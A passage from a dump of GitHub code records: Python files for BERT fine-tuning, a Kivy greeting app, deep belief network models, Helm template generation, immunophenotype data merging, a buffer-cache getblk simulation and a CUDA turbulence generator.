{x['location']} for {x['keyword']}\", axis=1)\ndata_list = []\nfor _, line in train_df.iterrows():\n    line_trans = transform(line[[\"full_text\", \"target\"]])\n    data_list.append(line_trans)\n\n\n## Fine Tuning\n\n# The hyperparameters\nprint(\"Starting fine-tuning...\")\nbatch_size = 32\nlr = 5e-6\n\n# The FixedBucketSampler and the DataLoader for making the mini-batches\ntrain_sampler = nlp.data.FixedBucketSampler(lengths=[int(item[1]) for item in data_list],\n                                            batch_size=batch_size,\n                                            shuffle=True)\nbert_dataloader = mx.gluon.data.DataLoader(data_list, batch_sampler=train_sampler)\n\n
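# NOTE: the lengths passed to FixedBucketSampler come from item[1], the\n# valid_length field produced by BERTDatasetTransform; bucketing by length\n# keeps padding per mini-batch to a minimum.\ntrainer = mx.gluon.Trainer(bert_classifier.collect_params(), 'adam',\n                           {'learning_rate': lr, 'epsilon': 1e-9})\n\n# Collect all differentiable parameters\n# `grad_req == 'null'` indicates no gradients are calculated (e.g. 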
constant parameters)\n# The gradients for these params are clipped later\nparams = [p for p in bert_classifier.collect_params().values() if p.grad_req != 'null']\ngrad_clip = 1\n\n# Training the model with only three epochs\nlog_interval = 4\nnum_epochs = 3\nfor epoch_id in range(num_epochs):\n metric.reset()\n step_loss = 0\n for batch_id, (token_ids, valid_length, segment_ids, label) in enumerate(bert_dataloader):\n with mx.autograd.record():\n # Load the data to the GPU\n token_ids = token_ids.as_in_context(ctx)\n valid_length = valid_length.as_in_context(ctx)\n segment_ids = segment_ids.as_in_context(ctx)\n label = label.as_in_context(ctx)\n # Forward computation\n out = bert_classifier(token_ids, segment_ids, valid_length.astype('float32'))\n ls = loss_function(out, label).mean()\n\n # And backwards computation\n ls.backward()\n\n # Gradient clipping\n trainer.allreduce_grads()\n nlp.utils.clip_grad_global_norm(params, 1)\n trainer.update(1)\n print(\"gradient clipped\")\n step_loss += ls.asscalar()\n metric.update([label], [out])\n\n # Printing vital information\n print('[Epoch {} Batch {}/{}] loss={:.4f}, lr={:.7f}, acc={:.3f}'\n .format(epoch_id, batch_id + 1, len(bert_dataloader),\n step_loss / log_interval,\n trainer.learning_rate, metric.get()[1]))\n step_loss = 0\n\n","repo_name":"othmanefc/bert-disaster","sub_path":"exploring.py","file_name":"exploring.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15554592416","text":"from kivy.app import App\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.label import Label\nfrom kivy.uix.image import Image\nfrom kivy.uix.button import Button\nfrom kivy.uix.textinput import TextInput\n\n\nclass sayHey(App):\n\tdef build(self):\n\t\t# returns a window object with all it's widgets\n\t\tself.window = GridLayout()\n\t\tself.window.cols = 1\n\t\tself.window.size_hint = (0.6, 0.7)\n\t\tself.window.pos_hint = {\"center_x\": 0.5, \"center_y\": 0.5}\n\n\t\tself.window.add_widget(Image(source=\"logo.jpg\"))\n\n\t\tself.greeting = Label(\n\t\t\ttext=\"What's your name?\",\n\t\t\tfont_size=18,\n\t\t\tcolor='#76b5c5'\n\t\t)\n\t\tself.window.add_widget(self.greeting)\n\n\t\tself.user = TextInput(\n\t\t\tmultiline=False,\n\t\t\tpadding_y=(20, 20),\n\t\t\tsize_hint=(1, 0.5)\n\t\t)\n\n\t\tself.window.add_widget(self.user)\n\n\t\tself.button = Button(\n\t\t\ttext=\"Send\",\n\t\t\tsize_hint=(1, 0.5),\n\t\t\tbold=True,\n\t\t\tbackground_color='#76b5c5',\n\t\t)\n\t\tself.button.bind(on_press=self.callback)\n\t\tself.window.add_widget(self.button)\n\n\t\treturn self.window\n\n\tdef callback(self, instance):\n\t\tself.greeting.text = \"Hello \" + self.user.text + \"!\"\n\n\nif __name__ == \"__main__\":\n\tsayHey().run()\n","repo_name":"roxy22r/SayHelloApp_Kivy","sub_path":"sayHey.py","file_name":"sayHey.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73897101867","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom abc import ABCMeta, abstractmethod\n\nimport numpy as np\nfrom scipy.stats import truncnorm\nfrom sklearn.base import BaseEstimator, TransformerMixin, ClassifierMixin, RegressorMixin\n\nfrom dbn.activations import SigmoidActivationFunction, ReLUActivationFunction\nfrom dbn.utils import batch_generator\nimport time\n\n\nclass BaseModel(object):\n def save(self, save_path):\n import pickle\n\n with open(save_path, 'wb') 
as fp:\n            pickle.dump(self, fp)\n\n    @classmethod\n    def load(cls, load_path):\n        import pickle\n\n        with open(load_path, 'rb') as fp:\n            return pickle.load(fp)\n\n\nclass BinaryRBM(BaseEstimator, TransformerMixin, BaseModel):\n\n    def __init__(self,\n                 n_hidden_units=100,\n                 activation_function='sigmoid',\n                 optimization_algorithm='sgd',\n                 learning_rate=1e-3,\n                 n_epochs=10,\n                 contrastive_divergence_iter=1,\n                 batch_size=32,\n                 verbose=True):\n        self.n_hidden_units = n_hidden_units\n        self.activation_function = activation_function\n        self.optimization_algorithm = optimization_algorithm\n        self.learning_rate = learning_rate\n        self.n_epochs = n_epochs\n        self.contrastive_divergence_iter = contrastive_divergence_iter\n        self.batch_size = batch_size\n        self.verbose = verbose\n        # self.W_list = list()\n\n    def fit(self, X):\n        self.n_visible_units = X.shape[1]\n        if self.activation_function == 'sigmoid':\n            self.W = np.random.randn(self.n_hidden_units, self.n_visible_units) / np.sqrt(self.n_visible_units)\n            self.c = np.random.randn(self.n_hidden_units) / np.sqrt(self.n_visible_units)\n            self.b = np.random.randn(self.n_visible_units) / np.sqrt(self.n_visible_units)\n            self._activation_function_class = SigmoidActivationFunction\n        elif self.activation_function == 'relu':\n            self.W = truncnorm.rvs(-0.2, 0.2, size=[self.n_hidden_units, self.n_visible_units]) / np.sqrt(\n                self.n_visible_units)\n            self.c = np.full(self.n_hidden_units, 0.1) / np.sqrt(self.n_visible_units)\n            self.b = np.full(self.n_visible_units, 0.1) / np.sqrt(self.n_visible_units)\n            self._activation_function_class = ReLUActivationFunction\n        else:\n            raise ValueError(\"Invalid activation function.\")\n\n        if self.optimization_algorithm == 'sgd':\n            self._stochastic_gradient_descent(X)\n        else:\n            raise ValueError(\"Invalid optimization algorithm.\")\n        return self\n\n    def transform(self, X):\n        if len(X.shape) == 1:\n            return self._compute_hidden_units(X)\n        transformed_data = self._compute_hidden_units_matrix(X)\n        return transformed_data\n\n    def _reconstruct(self, transformed_data):\n        return self._compute_visible_units_matrix(transformed_data)\n\n    def _stochastic_gradient_descent(self, _data):\n        accum_delta_W = np.zeros(self.W.shape)\n        accum_delta_b = np.zeros(self.b.shape)\n        accum_delta_c = np.zeros(self.c.shape)\n        for iteration in range(1, self.n_epochs + 1):\n            idx = np.random.permutation(len(_data))\n            data = _data[idx]\n            for batch in batch_generator(self.batch_size, data):\n                accum_delta_W[:] = .0\n                accum_delta_b[:] = .0\n                accum_delta_c[:] = .0\n                for sample in batch:\n                    delta_W, delta_b, delta_c = self._contrastive_divergence(sample)\n                    accum_delta_W += delta_W\n                    accum_delta_b += delta_b\n                    accum_delta_c += delta_c\n                self.W += self.learning_rate * (accum_delta_W / self.batch_size)\n                self.b += self.learning_rate * (accum_delta_b / self.batch_size)\n                self.c += self.learning_rate * (accum_delta_c / self.batch_size)\n            if self.verbose:\n                error = self._compute_reconstruction_error(data)\n                print(\">> Epoch %d finished \\tRBM Reconstruction error %f , %s\" %\n                      (iteration, error, time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))))\n\n    def _contrastive_divergence(self, vector_visible_units):\n        \"\"\"\n        Compute the gradient estimate using contrastive divergence (CD-k).\n        :param vector_visible_units: visible-layer state vector v_0\n        :return: (delta_W, delta_b, delta_c) parameter updates\n        \"\"\"\n        v_0 = vector_visible_units\n        v_t = np.array(v_0)\n\n        for t in range(self.contrastive_divergence_iter):\n            h_t = self._sample_hidden_units(v_t)\n            v_t = self._compute_visible_units(h_t)\n\n        v_k = v_t\n        h_0 = self._compute_hidden_units(v_0)\n        h_k = self._compute_hidden_units(v_k)\n        
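# CD-k gradient estimate: the positive phase uses the data statistics\n        # (v_0, h_0), the negative phase the k-step Gibbs reconstruction (v_k, h_k).\n        delta_W = np.outer(h_0, v_0) 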
- np.outer(h_k, v_k)\n delta_b = v_0 - v_k\n delta_c = h_0 - h_k\n\n return delta_W, delta_b, delta_c\n\n def _sample_hidden_units(self, vector_visible_units):\n hidden_units = self._compute_hidden_units(vector_visible_units)\n return (np.random.random_sample(len(hidden_units)) < hidden_units).astype(np.int64)\n\n def _sample_visible_units(self, vector_hidden_units):\n visible_units = self._compute_visible_units(vector_hidden_units)\n return (np.random.random_sample(len(visible_units)) < visible_units).astype(np.int64)\n\n def _compute_hidden_units(self, vector_visible_units):\n v = np.expand_dims(vector_visible_units, 0)\n return np.squeeze(self._compute_hidden_units_matrix(v))\n\n def _compute_hidden_units_matrix(self, matrix_visible_units):\n return np.transpose(self._activation_function_class.function(\n np.dot(self.W, np.transpose(matrix_visible_units)) + self.c[:, np.newaxis]))\n\n def _compute_visible_units(self, vector_hidden_units):\n h = np.expand_dims(vector_hidden_units, 0)\n return np.squeeze(self._compute_visible_units_matrix(h))\n\n def _compute_visible_units_matrix(self, matrix_hidden_units):\n return self._activation_function_class.function(np.dot(matrix_hidden_units, self.W) + self.b[np.newaxis, :])\n\n def _compute_free_energy(self, vector_visible_units):\n v = vector_visible_units\n return - np.dot(self.b, v) - np.sum(np.log(1 + np.exp(np.dot(self.W, v) + self.c)))\n\n def _compute_reconstruction_error(self, data):\n data_transformed = self.transform(data)\n data_reconstructed = self._reconstruct(data_transformed)\n return np.mean(np.sum((data_reconstructed - data) ** 2, 1))\n\n\nclass UnsupervisedDBN(BaseEstimator, TransformerMixin, BaseModel):\n def __init__(self,\n hidden_layers_structure=[100, 100],\n activation_function='sigmoid',\n optimization_algorithm='sgd',\n learning_rate_rbm=1e-3,\n n_epochs_rbm=10,\n contrastive_divergence_iter=1,\n batch_size=32,\n verbose=True):\n self.hidden_layers_structure = hidden_layers_structure\n self.activation_function = activation_function\n self.optimization_algorithm = optimization_algorithm\n self.learning_rate_rbm = learning_rate_rbm\n self.n_epochs_rbm = n_epochs_rbm\n self.contrastive_divergence_iter = contrastive_divergence_iter\n self.batch_size = batch_size\n self.rbm_layers = None\n self.verbose = verbose\n self.rbm_class = BinaryRBM\n\n def fit(self, X, y = None):\n self.rbm_layers = list()\n for n_hidden_units in self.hidden_layers_structure:\n rbm = self.rbm_class(n_hidden_units=n_hidden_units,\n activation_function=self.activation_function,\n optimization_algorithm=self.optimization_algorithm,\n learning_rate=self.learning_rate_rbm,\n n_epochs=self.n_epochs_rbm,\n contrastive_divergence_iter=self.contrastive_divergence_iter,\n batch_size=self.batch_size,\n verbose=self.verbose)\n self.rbm_layers.append(rbm)\n\n if self.verbose:\n print(\"[START] Pre-training step:\")\n input_data = X\n for rbm in self.rbm_layers:\n rbm.fit(input_data)\n input_data = rbm.transform(input_data)\n if self.verbose:\n print(\"[END] Pre-training step\")\n return self\n\n def transform(self, X):\n input_data = X\n for rbm in self.rbm_layers:\n input_data = rbm.transform(input_data)\n return input_data\n\n\nclass AbstractSupervisedDBN(BaseEstimator, BaseModel):\n __metaclass__ = ABCMeta\n\n def __init__(self, unsupervised_dbn_class,\n hidden_layers_structure=[100, 100],\n activation_function='sigmoid',\n optimization_algorithm='sgd',\n learning_rate=1e-3,\n learning_rate_rbm=1e-3,\n n_iter_backprop=100,\n l2_regularization=1.0,\n 
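# the RBM arguments below (n_epochs_rbm, contrastive_divergence_iter,\n                 # batch_size) are forwarded to UnsupervisedDBN for layer-wise pre-training\n                 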
n_epochs_rbm=10,\n contrastive_divergence_iter=1,\n batch_size=32,\n dropout_p=0, # float between 0 and 1. Fraction of the input units to drop\n verbose=True):\n self.unsupervised_dbn = unsupervised_dbn_class(hidden_layers_structure=hidden_layers_structure,\n activation_function=activation_function,\n optimization_algorithm=optimization_algorithm,\n learning_rate_rbm=learning_rate_rbm,\n n_epochs_rbm=n_epochs_rbm,\n contrastive_divergence_iter=contrastive_divergence_iter,\n batch_size=batch_size,\n verbose=verbose)\n self.unsupervised_dbn_class = unsupervised_dbn_class\n self.n_iter_backprop = n_iter_backprop\n self.l2_regularization = l2_regularization\n self.learning_rate = learning_rate\n self.batch_size = batch_size\n self.dropout_p = dropout_p\n self.p = 1 - self.dropout_p\n self.verbose = verbose\n\n def fit(self, X, y=None, pre_train= True):\n if pre_train:\n self.pre_train(X)\n self._fine_tuning(X, y)\n return self\n\n def predict(self, X):\n if len(X.shape) == 1:\n X = np.expand_dims(X, 0)\n transformed_data = self.transform(X)\n predicted_data = self._compute_output_units_matrix(transformed_data)\n return predicted_data\n\n def pre_train(self, X):\n self.unsupervised_dbn.fit(X)\n return self\n\n def transform(self, *args):\n return self.unsupervised_dbn.transform(*args)\n\n @abstractmethod\n def _transform_labels_to_network_format(self, labels):\n return\n\n @abstractmethod\n def _compute_output_units_matrix(self, matrix_visible_units):\n return\n\n @abstractmethod\n def _determine_num_output_neurons(self, labels):\n return\n\n @abstractmethod\n def _stochastic_gradient_descent(self, data, labels):\n return\n\n @abstractmethod\n def _fine_tuning(self, data, _labels):\n return\n\n","repo_name":"ZhaiNY2014/d-s","sub_path":"dbn/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72187307947","text":"import os\nimport sys\nimport subprocess\nimport yaml\nimport argparse\n\nMANIFESTS_PATH = \"Manifests\"\nINBOUND_HELM_TEMPLATE_PATH = \"Applications/cni-inbound\"\nOUTBOUND_HELM_TEMPLATE_PATH = \"Applications/cni-outbound\"\nMANIFESTS_INPUT_DIRS = [\"Dev\", \"Prod\"]\nHELM_TEMPLATE_OUTPUT_PATH = os.path.join(MANIFESTS_PATH, \"Output\")\n\n\nclass ManifestProcessor:\n def __init__(self, manifest_path=\"\"):\n if manifest_path == \"\":\n self.manifest_path = MANIFESTS_PATH\n else:\n self.manifest_path = manifest_path\n return\n\n def form_eks_cluster_name(self, env_name, region_name, deployment_id, direction):\n return \"{}-{}-{}-{}-data-plane\".format(env_name, region_name, deployment_id, direction)\n\n def create_output_template_dirs(self, eks_cluster_name):\n\n # Create Output Directory for HELM Templates\n path = os.path.join(HELM_TEMPLATE_OUTPUT_PATH, eks_cluster_name)\n try:\n os.makedirs(path, exist_ok=True)\n except OSError as e:\n print(\"Creation of the template directory %s failed\" % path)\n raise e\n\n def generate_inbound_helm_template(self, manifest_data, manifest_file, cluster_name_suffix):\n # Inbound Dataplane Template\n inbound_eks_cluster_name = self.form_eks_cluster_name(\n manifest_data[\"env_name\"], manifest_data[\"region\"], manifest_data[\"deployment_id\"], cluster_name_suffix\n )\n self.create_output_template_dirs(inbound_eks_cluster_name)\n response = subprocess.run(\n [\n \"helm\",\n \"template\",\n manifest_data[\"deployment_id\"],\n INBOUND_HELM_TEMPLATE_PATH,\n \"--values\",\n manifest_file,\n \"--output-dir\",\n 
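# --output-dir makes helm write the rendered manifests to disk instead of stdout\n                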
os.path.join(HELM_TEMPLATE_OUTPUT_PATH, inbound_eks_cluster_name),\n ]\n )\n if response.returncode != 0:\n print(response)\n sys.exit(\"Helm template generation failed\")\n\n def generate_outbound_helm_template(self, manifest_data, manifest_file, cluster_name_suffix):\n outbound_eks_cluster_name = self.form_eks_cluster_name(\n manifest_data[\"env_name\"], manifest_data[\"region\"], manifest_data[\"deployment_id\"], cluster_name_suffix\n )\n self.create_output_template_dirs(outbound_eks_cluster_name)\n response = subprocess.run(\n [\n \"helm\",\n \"template\",\n manifest_data[\"deployment_id\"],\n OUTBOUND_HELM_TEMPLATE_PATH,\n \"--values\",\n manifest_file,\n \"--output-dir\",\n os.path.join(HELM_TEMPLATE_OUTPUT_PATH, outbound_eks_cluster_name),\n ]\n )\n if response.returncode != 0:\n print(response)\n sys.exit(\"Helm template generation failed\")\n\n def generate_helm_template(self, manifest_data, manifest_file):\n # Inbound Dataplane Template\n self.generate_inbound_helm_template(manifest_data, manifest_file, \"inbound\")\n\n # Outbound Dataplane Template\n if \"outbound_vpcs_config\" in manifest_data:\n outbound_vpc_cfg = manifest_data[\"outbound_vpcs_config\"]\n for vpc_suffix in outbound_vpc_cfg.keys():\n self.generate_outbound_helm_template(manifest_data, manifest_file, \"outbound-\" + str(vpc_suffix))\n else:\n self.generate_outbound_helm_template(manifest_data, manifest_file, \"outbound\")\n\n def process_manifest_file(self, manifest_file):\n with open(manifest_file, \"r\") as file:\n manifest_data = yaml.load(file, Loader=yaml.FullLoader)\n print(\"***Generating Helm Templates for manifest: \", manifest_file)\n self.generate_helm_template(manifest_data, manifest_file)\n\n def fetch_manifest_files_list(self, manifests_dir_path):\n manifest_file_list = []\n for dirname in MANIFESTS_INPUT_DIRS:\n for root, dir_names, file_names in os.walk(os.path.join(manifests_dir_path, dirname)):\n for file_name in file_names:\n if file_name.lower().endswith(\".yaml\"):\n manifest_file_list.append(os.path.join(root, file_name))\n return manifest_file_list\n\n def process(self):\n self.process_manifest_file(self.manifest_path)\n\ndef get_fixed_arguments(args):\n \"\"\"\n return the fixed arguments as a dictionary\n :param args:\n :return:\n \"\"\"\n return vars(args)\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"This program generates EKS Helm Templates for manifests.\"\n )\n parser.add_argument(\"--manifest_path\", help=\"path to the manifest file describing the deployment\")\n args = parser.parse_args()\n deploy_args = get_fixed_arguments(args)\n\n manifests = ManifestProcessor(deploy_args[\"manifest_path\"])\n manifests.process()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"agajjala/cni-deployer","sub_path":"src/helm_template_generator.py","file_name":"helm_template_generator.py","file_ext":"py","file_size_in_byte":4938,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"14416100870","text":"\nimport math, random\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nsns.set_theme()\n\nimport pandas as pd\nfrom Controllers.DataScienceManager import DataScienceManager as dsm\n\n#Instantiate Controllers\nuse_full_dataset = True\nuse_database = False\n\ncluster_cut_off = 0.9\n\ndata_sci_mgr = dsm.DataScienceManager(\n use_full_dataset=use_full_dataset, \n use_database=use_database\n)\n\n\"\"\"filename = 
'Analysis/Multivariate/11042023_c_rc2/multivar_qc_fs_bs_candidate_features_11042023.csv' \nphenos_subset = pd.read_csv(filename, index_col=0)\nindeces = phenos_subset.values[:,1:3].sum(axis=1)\nindeces = np.where(indeces >= 1)\ncandidates = pd.Series(phenos_subset.iloc[indeces]['label'].values, name='phenotype_id')\"\"\"\n\nphenos_subset = ['P4:3799', 'MFI:469', 'P5 gd:1759', 'P1:7363', 'P2:8981', 'P2:8332', 'P7 Mono:3409', 'P2:19526']\ncandidates = pd.Series(phenos_subset, name='phenotype_id')\n\nif cluster_cut_off == 0.95:\n filename = 'Data/phenos_corr_dict_0.95_05042023.parquet'\nelif cluster_cut_off == 0.9:\n filename = 'Data/phenos_corr_dict_0.9_06042023.parquet'\nelif cluster_cut_off == 0.7:\n filename = 'Data/phenos_corr_dict_0.7_06042023.parquet'\ncorrelates = pd.read_parquet(filename)\n\npheno_ref_data = data_sci_mgr.sql.read_table_into_data_frame(schema_name='KIR_HLA_STUDY', table_name='immunophenotype_definitions')\nols_stats = data_sci_mgr.sql.read_table_into_data_frame(schema_name='KIR_HLA_STUDY', table_name='model_result_ols')\npheno_data_stats = data_sci_mgr.sql.read_table_into_data_frame(schema_name='KIR_HLA_STUDY', table_name='immunophenotype_summary_stats')\n\ncandidates = pheno_ref_data.merge(candidates, how='right', left_on='phenotype_id', right_on='phenotype_id')\ncandidates = candidates.merge(ols_stats, how='left', left_on='phenotype_id', right_on='feature_name')\ncandidates = candidates.merge(pheno_data_stats, how='left', left_on='phenotype_id', right_on='measurement_id')\ncandidates = candidates.merge(correlates, how='left', left_on='phenotype_id', right_on='label')\n\ndate_str = data_sci_mgr.data_mgr.get_date_str()\nfilename = 'Analysis/RandomForest/candidate_summary_stats_{}.csv'.format(date_str)\ncandidates.to_csv(filename)\n\n","repo_name":"ChrisMBrooks/KIR_HLA","sub_path":"Scripts/General/enirch_candidates.py","file_name":"enirch_candidates.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22149961159","text":"import multiprocessing #threading interface\nimport time #sleep()\nimport os\nimport signal\nimport multiprocessing\nimport Header\n\n\ndef _writeAsynchronously(lock,queues,blockNumber):\n\n print(\"************ Asynchronous Writing of Block number-\",blockNumber,\" ***************\")\n time.sleep(8) #sleep for 4 seconds to simulate writing to disk\n \n queues.clearDelayedWriteBit(blockNumber)\n\n print(\"************ Asynchronous Writing of Block Number-\",blockNumber,\" Completed ***************\")\n \n #adding buffer to head of free list, to follow the LRU algorithm\n lock.acquire()\n queues.addToflFirst(blockNumber)\n lock.release()\n\n\ndef asynchronousWrite(lock,queues,blockNumber):\n writingProcess=multiprocessing.Process(target=_writeAsynchronously,args=(lock,queues,blockNumber,))\n writingProcess.start()\n \n return 1\n\n\n# These functions are called by the target environment when the corresponding signal occurs.\n# The target environment suspends execution of the program until the signal catcher returns.\n\n# This function generates signal for processes waiting for a particular buffer\ndef sigint_catcher(sig,frame):\n print(\"process: \",os.getpid(),\" woke up as it was sleeping for a particular buffer\" )\n\n#It generates the signal for processes waiting for any buffer\ndef sighup_catcher(sig,frame):\n print(\"process: \",os.getpid(),\" woke up as it was sleeping for a any buffer\" )\n\n# Used only in case of 'Delayed write' case. 
This allows an asynchronous write to disk.\n\n#sleep function to make a process sleep for a particular buffer\ndef mySleepForBuffer(sleepQueue,buffer):\n    signal.signal(signal.SIGINT,sigint_catcher)\n    sleepQueue.add(buffer,os.getpid())\n    signal.pause()#process will sleep till SIGINT signal is raised\n\n\n#sleep function to make a process sleep for any buffer\ndef mySleepForAnyBuffer(sleepQueue):\n    signal.signal(signal.SIGHUP,sighup_catcher)\n    sleepQueue.add(-1,os.getpid()) #processes waiting for any buffer register -1 as the required buffer number\n    signal.pause()#process will sleep till SIGHUP signal is raised\n\n\n\ndef getBlock(sleepQueue,blockNumber,lock,queues):\n    bufferFound=False\n    while (not bufferFound):\n\n        lock.acquire() #lock\n\n        #The buffer is in the hashQ\n        if (queues.isPresentInHashQ(blockNumber)):\n            #5 The buffer is found in the hashQ but is currently busy, so the process goes to sleep\n            if(queues.isLocked(blockNumber)):\n                print(\"Process \",os.getpid(),\" is going to sleep as buffer \",blockNumber,\" is present in hashQ and is busy\")\n                #release the lock acquired above and retry on the next iteration\n                lock.release() #5 release\n                mySleepForBuffer(sleepQueue,blockNumber)\n                continue\n\n            #1. Required buffer is in the hash queue and free\n            queues.setLockedBit(blockNumber)\n            queues.removeFromfl(blockNumber)\n\n            #Return the buffer to the requesting process\n            print(\"Process \",os.getpid(),\" will get buffer \",blockNumber,\" from hashQ\")\n            bufferFound=True\n            lock.release() #1 release\n            return blockNumber\n\n        #Buffer is not in the hashQ. Hence, check freelist for the buffer\n        else:\n            #4. freelist is empty, i.e. there is no buffer to use, so the process goes to sleep.\n            if (queues.isEmptyfl()):\n                print(\"Process \",os.getpid(),\" is going to sleep as freelist is empty\")\n\n                lock.release() #4 release\n                mySleepForAnyBuffer(sleepQueue)\n                continue\n\n            #2. freelist is not empty and just getting the first free buffer available\n            blockNumber_fl=queues.getAnyFromfl()\n\n            
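#The numbered cases in this function appear to follow the classic five getblk\n            #scenarios (buffer busy, buffer free in hash queue, delayed-write buffer,\n            #empty free list, free buffer reassigned to a new block).\n            #3. 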
Check if the buffer is marked as 'delayed write'\n if(queues.isDelayedWrite(blockNumber_fl)):\n\n #Now removing it from free list\n queues.removeFromfl(blockNumber_fl)\n print(\"freelist after removing \",blockNumber_fl)\n queues.printfl()\n #For revealing the scenario under which process is going to do asynchronous write\n print(\"Process \",os.getpid(),\" came across free buffer \",blockNumber_fl, \" but marked as delayed write so is executing asynchronous write\")\n \n lock.release() #3 release\n asynchronousWrite(lock,queues,blockNumber_fl)\n continue\n\n #Found a free buffer in the freelist \n queues.removeFromHashQ(blockNumber_fl)\n\n print(\"Replace buffer \",blockNumber_fl,\" in freelist, with buffer \",blockNumber)\n\n\n print(\"Buffer \",blockNumber_fl,\" is removed from free list\")\n print(\"Buffer \",blockNumber,\" added to the hash queue\")\n #replacing the old block number(returnrd from the freelist ) with the new block number\n queues.setBlockNumber(blockNumber_fl,blockNumber)\n \n\n #Add buffer to the new hash queue\n queues.addBlockToHashQ(blockNumber)\n\n #remove it from the free list\n queues.removeFromfl(blockNumber) \n\n #Update status of the buffer\n queues.setLockedBit(blockNumber)\n queues.clearValidBit(blockNumber)\n\n\n bufferFound=True\n lock.release() #2 release\n return blockNumber\n\n","repo_name":"rohitshakya/Get_Block_Implementation","sub_path":"GetBlock.py","file_name":"GetBlock.py","file_ext":"py","file_size_in_byte":5426,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72383690988","text":"import math\nfrom numba import cuda\nimport numpy as np\nfrom numpy import pi, ones, zeros, sin, cos, sqrt, arange\n\n\n@cuda.jit\ndef turbo_kernel(kx, ky, kz, xc, yc, zc, psi, um, sxm, sym, szm, dx, dy, dz, u_, v_, w_):\n \"\"\"\n This is the cuda kernel for the turbulence generator. Our approach is to assign one thread per spatial grid point.\n Then, the job of each thread is to compute the Fourier summation @ that grid point.\n :param kx: Fourier modes in the x direction\n :param ky: Fourier modes in the y direction\n :param kz: Fourier modes in the z direction\n :param xc: x coordinate of cell centers\n :param yc: y coordinate of cell centers\n :param zc: z coordinate of cell centers\n :param psi: Wave component\n :param um: Fourier velocity magnitude\n :param sxm: Auxiliary vector (sigma in the paper)\n :param sym: Auxiliary vector (sigma in the paper)\n :param szm: Auxiliary vector (sigma in the paper)\n :param dx: Grid spacing in the x direction\n :param dy: Grid spacing in the y direction\n :param dz: Grid spacing in the z direction\n :param u_: x velocity component of the generated turbulence\n :param v_: y velocity component of the generated turbulence\n :param w_: z velocity component of the generated turbulence\n :return: u, v, w of the generated turbulent vector field\n \"\"\"\n # calculate thread location for 3D array\n i, j, k = cuda.grid(3)\n\n # Each thread is assigned to a physical grid point. 
Each thread will compute the Fourier series @ that point\n if i < u_.shape[0] and j < v_.shape[1] and k < w_.shape[2]:\n for m in range(0, len(kx)):\n arg = kx[m] * xc[i] + ky[m] * yc[j] + kz[m] * zc[k] - psi[m]\n bmx = 2.0 * um[m] * math.cos(arg - kx[m] * dx / 2.0)\n bmy = 2.0 * um[m] * math.cos(arg - ky[m] * dy / 2.0)\n bmz = 2.0 * um[m] * math.cos(arg - kz[m] * dz / 2.0)\n u_[i, j, k] += bmx * sxm[m]\n v_[i, j, k] += bmy * sym[m]\n w_[i, j, k] += bmz * szm[m]\n\n\ndef generate_isotropic_turbulence(lx, ly, lz, nx, ny, nz, nmodes, wn1, especf):\n \"\"\"\n Given an energy spectrum, this function computes a discrete, staggered, three\n dimensional velocity field in a box whose energy spectrum corresponds to the input energy\n spectrum up to the Nyquist limit dictated by the grid\n\n This function returns u, v, w as the axial, transverse, and azimuthal velocities.\n\n Parameters:\n -----------\n lx: float\n The domain size in the x-direction.\n ly: float\n The domain size in the y-direction.\n lz: float\n The domain size in the z-direction.\n nx: integer\n The number of grid points in the x-direction.\n ny: integer\n The number of grid points in the y-direction.\n nz: integer\n The number of grid points in the z-direction.\n wn1: float\n Smallest wavenumber. Typically dictated by spectrum or domain size.\n espec: functor\n A callback function representing the energy spectrum.\n \"\"\"\n\n # generate cell centered x-grid\n dx = lx / nx\n dy = ly / ny\n dz = lz / nz\n\n # compute random angles\n np.random.seed(7)\n phi = 2.0 * pi * np.random.uniform(0.0, 1.0, nmodes)\n nu = np.random.uniform(0.0, 1.0, nmodes)\n theta = np.arccos(2.0 * nu - 1.0)\n psi = np.random.uniform(-pi / 2.0, pi / 2.0, nmodes)\n\n # highest wave number that can be represented on this grid (nyquist limit)\n wnn = max(np.pi / dx, max(np.pi / dy, np.pi / dz))\n print('I will generate data up to wave number: ', wnn)\n\n # wavenumber step\n dk = (wnn - wn1) / nmodes\n\n # wavenumber at cell centers\n wn = wn1 + 0.5 * dk + arange(0, nmodes) * dk\n\n dkn = ones(nmodes) * dk\n\n # wavenumber vector from random angles\n kx = sin(theta) * cos(phi) * wn\n ky = sin(theta) * sin(phi) * wn\n kz = cos(theta) * wn\n\n # create divergence vector\n ktx = np.sin(kx * dx / 2.0) / dx\n kty = np.sin(ky * dy / 2.0) / dy\n ktz = np.sin(kz * dz / 2.0) / dz\n\n # Enforce Mass Conservation\n phi1 = 2.0 * pi * np.random.uniform(0.0, 1.0, nmodes)\n nu1 = np.random.uniform(0.0, 1.0, nmodes)\n theta1 = np.arccos(2.0 * nu1 - 1.0)\n zetax = sin(theta1) * cos(phi1)\n zetay = sin(theta1) * sin(phi1)\n zetaz = cos(theta1)\n sxm = zetay * ktz - zetaz * kty\n sym = -(zetax * ktz - zetaz * ktx)\n szm = zetax * kty - zetay * ktx\n smag = sqrt(sxm * sxm + sym * sym + szm * szm)\n sxm = sxm / smag\n sym = sym / smag\n szm = szm / smag\n\n # verify that the wave vector and sigma are perpendicular\n kk = np.sum(ktx * sxm + kty * sym + ktz * szm)\n print('Orthogonality of k and sigma (divergence in wave space):')\n print(kk)\n\n # get the modes\n km = wn\n\n espec = especf(km)\n espec = espec.clip(0.0)\n\n # generate turbulence at cell centers\n um = sqrt(espec * dkn)\n u_ = zeros([nx, ny, 